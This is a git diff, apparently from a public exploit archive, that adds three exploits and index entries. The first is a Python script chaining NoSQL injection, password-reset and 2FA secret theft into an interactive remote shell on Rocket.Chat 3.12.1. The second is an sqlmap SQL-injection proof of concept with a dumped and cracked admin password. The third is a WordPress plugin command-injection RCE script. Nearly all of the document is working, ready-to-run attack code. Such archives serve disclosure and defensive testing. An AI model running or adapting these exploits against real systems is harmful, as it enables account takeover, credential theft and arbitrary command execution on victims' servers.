diff --git a/exploits/linux/webapps/50108.py b/exploits/linux/webapps/50108.py new file mode 100755 index 000000000..a04d78451 --- /dev/null +++ b/exploits/linux/webapps/50108.py @@ -0,0 +1,196 @@ +# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2) +# Author: enox +# Date: 06-06-2021 +# Product: Rocket.Chat +# Vendor: https://rocket.chat/ +# Vulnerable Version(s): Rocket.Chat 3.12.1 (2) +# CVE: CVE-2021-22911 +# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat +# Info : This is a faster exploit that utilizes the authenticated nosql injection to retrieve the reset token for administrator instead of performing blind nosql injection. + +#!/usr/bin/python + +import requests +import string +import time +import hashlib +import json +import oathtool +import argparse + +parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') +parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) +parser.add_argument('-a', help='Administrator email', required=True) +parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) +args = parser.parse_args() + + +adminmail = args.a +lowprivmail = args.u +target = args.t + + +def forgotpassword(email,url): + payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' + headers={'content-type': 'application/json'} + r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) + print("[+] Password Reset Email Sent") + + +def resettoken(url): + u = url+"/api/v1/method.callAnon/getPasswordPolicy" + headers={'content-type': 'application/json'} + token = "" + + num = list(range(0,10)) + string_ints = [str(int) for int in num] + characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints + + while len(token)!= 43: + for c in characters: + payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) + r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) + time.sleep(0.5) + if 'Meteor.Error' not in r.text: + token += c + print(f"Got: {token}") + + print(f"[+] Got token : {token}") + return token + + +def changingpassword(url,token): + payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' + headers={'content-type': 'application/json'} + r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) + if "error" in r.text: + exit("[-] Wrong token") + print("[+] Password was changed !") + + +def twofactor(url,email): + # Authenticating + sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() + payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' + headers={'content-type': 'application/json'} + r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) + if "error" in r.text: + exit("[-] Couldn't authenticate") + data = json.loads(r.text) + data =(data['message']) + userid = data[32:49] + token = data[60:103] + print(f"[+] Succesfully authenticated as {email}") + + # Getting 2fa code + cookies = {'rc_uid': userid,'rc_token': token} + headers={'X-User-Id': userid,'X-Auth-Token': token} + payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' + r = requests.get(url+payload,cookies=cookies,headers=headers) + code = r.text[46:98] + print(f"Got the code for 2fa: {code}") + return code + +def admin_token(url,email): + # Authenticating + sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() + payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' + headers={'content-type': 'application/json'} + r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) + if "error" in r.text: + exit("[-] Couldn't authenticate") + data = json.loads(r.text) + data =(data['message']) + userid = data[32:49] + token = data[60:103] + print(f"[+] Succesfully authenticated as {email}") + + # Getting reset token for admin + cookies = {'rc_uid': userid,'rc_token': token} + headers={'X-User-Id': userid,'X-Auth-Token': token} + payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"}' + r = requests.get(url+payload,cookies=cookies,headers=headers) + code = r.text[46:89] + print(f"Got the reset token: {code}") + return code + + +def changingadminpassword(url,token,code): + payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' + headers={'content-type': 'application/json'} + r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) + if "403" in r.text: + exit("[-] Wrong token") + + print("[+] Admin password changed !") + + +def rce(url,code,cmd): + # Authenticating + sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() + headers={'content-type': 'application/json'} + payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' + r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) + if "error" in r.text: + exit("[-] Couldn't authenticate") + data = json.loads(r.text) + data =(data['message']) + userid = data[32:49] + token = data[60:103] + print("[+] Succesfully authenticated as administrator") + + # Creating Integration + payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' + cookies = {'rc_uid': userid,'rc_token': token} + headers = {'X-User-Id': userid,'X-Auth-Token': token} + r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) + data = r.text + data = data.split(',') + token = data[12] + token = token[9:57] + _id = data[18] + _id = _id[7:24] + + # Triggering RCE + u = url + '/hooks/' + _id + '/' +token + r = requests.get(u) + print(r.text) + +############################################################ + + +# Getting Low Priv user +print(f"[+] Resetting {lowprivmail} password") +## Sending Reset Mail +forgotpassword(lowprivmail,target) + +## Getting reset token through blind nosql injection +token = resettoken(target) + +## Changing Password +changingpassword(target,token) + + +# Privilege Escalation to admin +## Getting secret for 2fa +secret = twofactor(target,lowprivmail) + + +## Sending Reset mail +print(f"[+] Resetting {adminmail} password") +forgotpassword(adminmail,target) + +## Getting admin reset token through nosql injection authenticated +token = admin_token(target,lowprivmail) + + +## Resetting Password +code = oathtool.generate_otp(secret) +changingadminpassword(target,token,code) + +## Authenticating and triggering rce + +while True: + cmd = input("CMD:> ") + code = oathtool.generate_otp(secret) + rce(target,code,cmd) \ No newline at end of file diff --git a/exploits/php/webapps/50109.txt b/exploits/php/webapps/50109.txt new file mode 100644 index 000000000..2659400bc --- /dev/null +++ b/exploits/php/webapps/50109.txt @@ -0,0 +1,52 @@ +# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection +# Date: 2021-07-07 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip +# Version: 1.0 +# Tested on: Windows 10, XAMPP + + +################ +# Description # +################ + +The admin panel login can be assessed at http://{ip}/scheduler/admin/login.php. The username parameter is vulnerable to time-based SQL injection. +Upon successful dumping the admin password hash, we can decrypt and obtain the plain-text password. Hence, we could authenticate as Administrator. + + +########### +# PoC # +########### + +Run sqlmap to dump username and password: + +$ sqlmap -u "http://localhost/scheduler/classes/Login.php?f=login" --data="username=admin&password=blabla" --cookie="PHPSESSID=n3to3djqetf42c2e7l257kspi5" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump + + +########### +# Output # +########### + +Parameter: username (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: username=admin' AND (SELECT 7551 FROM (SELECT(SLEEP(5)))QOUn) AND 'MOUZ'='MOUZ&password=blabla + Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + +web server operating system: Windows +web application technology: PHP 5.6.24, Apache 2.4.23 +back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) +current database: 'scheduler' + +Database: scheduler +Table: users +[1 entry] ++----------+----------------------------------+ +| username | password | ++----------+----------------------------------+ +| admin | 0192023a7bbd73250516f069df18b500 | ++----------+----------------------------------+ + + +The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123 \ No newline at end of file diff --git a/exploits/php/webapps/50110.py b/exploits/php/webapps/50110.py new file mode 100755 index 000000000..169c29ff1 --- /dev/null +++ b/exploits/php/webapps/50110.py @@ -0,0 +1,71 @@ +# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2) +# Date: 07.07.2021 +# Exploit Author: Beren Kuday GORUN +# Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/ +# Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip +# Version: 20161228 and possibly prior +# Fixed version: 20180826 +# CVE : CVE-2018-15877 + +""" +------------------------- +Usage: +┌──(root@kali)-[~/tools] +└─# python3 WordPress-Activity-Monitor-RCE.py +What's your target IP? +192.168.101.28 +What's your username? +mark +What's your password? +password123 +[*] Please wait... +[*] Perfect! +www-data@192.168.101.28 whoami +www-data +www-data@192.168.101.28 pwd +/var/www/html/wp-admin +www-data@192.168.101.28 id +uid=33(www-data) gid=33(www-data) groups=33(www-data) +""" + +import requests +from bs4 import BeautifulSoup + +def exploit(whoami, ip): + while 1: + cmd = input(whoami+"@"+ip+" ") + url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools' + payload = "google.com.tr | " + cmd + data = {'ip': payload , 'lookup' : 'lookup' } + x = requests.post(url, data = data, cookies=getCookie(ip)) + html_doc = x.text.split("

Output from dig:

")[1] + soup = BeautifulSoup(html_doc, 'html.parser') + print(soup.p.text) + +def poc(ip): + url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools' + myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' } + x = requests.post(url, data = myobj, cookies=getCookie(ip)) + html_doc = x.text.split("

Output from dig:

")[1] + soup = BeautifulSoup(html_doc, 'html.parser') + print("[*] Perfect! ") + exploit(soup.p.text, ip) + +def getCookie(ip): + url = 'http://' + ip + '/wp-login.php' + #log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1 + data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'} + x = requests.post(url, data = data) + cookies = {} + cookie = str(x.headers["Set-Cookie"]) + + for i in cookie.split(): + if(i.find("wordpress") != -1 and i.find("=") != -1): + cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1] + return cookies + +ip = input("What's your target IP?\n") +username = input("What's your username?\n") +password = input("What's your password?\n") +print("[*] Please wait...") +poc(ip) \ No newline at end of file diff --git a/exploits/windows/local/49858.txt b/exploits/windows/local/49858.txt index 72fe92d7b..569b3e977 100644 --- a/exploits/windows/local/49858.txt +++ b/exploits/windows/local/49858.txt @@ -5,6 +5,7 @@ # Software Link: https://www.splinterware.com/download/ssproeval.exe # Version: 5.30 Professional # Tested on: Windows 10 Pro 20H2 x64 +# CVE: CVE-2021-31771 System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with diff --git a/files_exploits.csv b/files_exploits.csv index 6c51ad110..9a73e9d3f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44204,6 +44204,7 @@ id,file,description,date,author,type,platform,port 50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple, 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",2021-06-24,Pergyz,webapps,cfm, 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",2021-06-24,"Koh You Liang",webapps,hardware, +50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",2021-07-07,enox,webapps,linux, 50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",2021-07-06,TheSmuggler,webapps,php, 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php, 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php, @@ -44245,3 +44246,5 @@ id,file,description,date,author,type,platform,port 50104,exploits/hardware/webapps/50104.txt,"Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation",2021-07-06,"Andrea D\'Ubaldo",webapps,hardware, 50105,exploits/php/webapps/50105.txt,"Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)",2021-07-06,faisalfs10x,webapps,php, 50106,exploits/php/webapps/50106.txt,"Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution",2021-07-06,faisalfs10x,webapps,php, +50109,exploits/php/webapps/50109.txt,"Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection",2021-07-07,faisalfs10x,webapps,php, +50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",2021-07-07,"Beren Kuday GÖRÜN",webapps,php,